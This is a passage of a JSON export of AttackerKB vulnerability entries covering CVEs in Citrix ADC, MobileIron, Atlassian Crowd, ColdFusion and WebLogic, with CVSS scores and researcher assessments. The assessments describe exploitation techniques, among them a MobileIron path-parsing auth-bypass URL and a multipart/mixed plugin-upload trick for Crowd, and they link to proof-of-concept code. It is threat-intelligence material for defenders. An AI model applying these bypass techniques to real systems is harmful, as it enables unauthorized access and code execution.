"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:23", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 1:02pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n**gwillcox-r7** at October 20, 2020 5:54pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "href": "https://attackerkb.com/topics/r0FRieLWQM/cve-2020-8196", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-13T08:05:31", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.\n\n \n**Recent assessments:** \n \n**mekhalleh** at July 12, 2020 6:17pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. <https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI write quicly a metasploit auxilary scanner and tested on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\n**gwillcox-r7** at October 20, 2020 5:52pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. <https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI write quicly a metasploit auxilary scanner and tested on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "href": "https://attackerkb.com/topics/1F4m9YYhx2/cve-2020-8193", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-20T20:13:22", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 12:59pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8195", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "href": "https://attackerkb.com/topics/rSz4fDlp1Z/cve-2020-8195", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-20T20:11:10", "description": "An authentication bypass vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 that allows remote attackers to bypass authentication mechanisms via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 22, 2020 8:22pm UTC reported:\n \n \n https://mobileiron/mifs/.;/services/someService\n \n\nThe \u201c[auth bypass](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>)\u201d relies on a discrepancy between how Apache and Tomcat parse the path component in the URI, which is the same technique that was applied to [CVE-2020-5902](<https://attackerkb.com/topics/evLpPlZf0i/cve-2020-5902-tmui-rce-vulnerability>).\n\n\u201cBypassing authentication\u201d allows one to achieve RCE against either the user interface or the management interface, though it\u2019s not clear that [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) is the RCE used in the [blog post](<https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html>). This is more of an ACL bypass than an auth bypass, honestly. This was briefly mentioned in the post.\n\nSince MobileIron is [mobile device management (MDM)](<https://en.wikipedia.org/wiki/Mobile_device_management>) software, which is increasingly relevant as the workforce shifts toward remote work, compromising a target\u2019s MDM infrastructure may have devastating consequences.\n\nDevelopers gluing disparate pieces of software together should take care to avoid turning expected input from one software into unexpected input for another. This bug class is [well-documented](<https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf>). In the end, even input sanitization should take care to avoid normalization bugs.\n\nGreat find, Orange!\n\nAlso see [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), a MobileIron RCE.\n\n**ETA: [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>) uses an _ACL_ bypass, but in retrospect, I don\u2019t think it\u2019s this _auth_ bypass.** This analysis can be applied to [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505>), consequently.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "attackerkb", "title": "CVE-2020-15506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15505", "CVE-2020-15506", "CVE-2020-5902"], "modified": "2020-09-18T00:00:00", "id": "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "href": "https://attackerkb.com/topics/nPl8YRkKRb/cve-2020-15506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T07:43:34", "description": "Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. These vulnerabilities, if exploited, could result in a number of security issues .\n\n \n**Recent assessments:** \n \n**ccondon-r7** at July 10, 2020 11:15pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**busterb** at July 10, 2020 11:17pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T00:00:00", "type": "attackerkb", "title": "CTX276688: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-09T00:00:00", "id": "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "href": "https://attackerkb.com/comments/7cdfb3cc-0c4d-43e2-b2d5-88dca8befba8", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-12T22:50:36", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "attackerkb", "title": "CVE-2019-11580", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-07-24T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:32:31", "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-13T00:00:00", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-02-13T00:00:00", "id": "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:40", "description": "Adobe ColdFusion Update 5 and earlier versions, ColdFusion 11 Update 13 and earlier versions have an exploitable Deserialization of Untrusted Data vulnerability. Successful exploitation could lead to arbitrary code execution.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:50pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-19T00:00:00", "type": "attackerkb", "title": "CVE-2018-4939", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2020-09-02T00:00:00", "id": "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799", "href": "https://attackerkb.com/topics/Zt4RJnPnpD/cve-2018-4939", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:39", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to 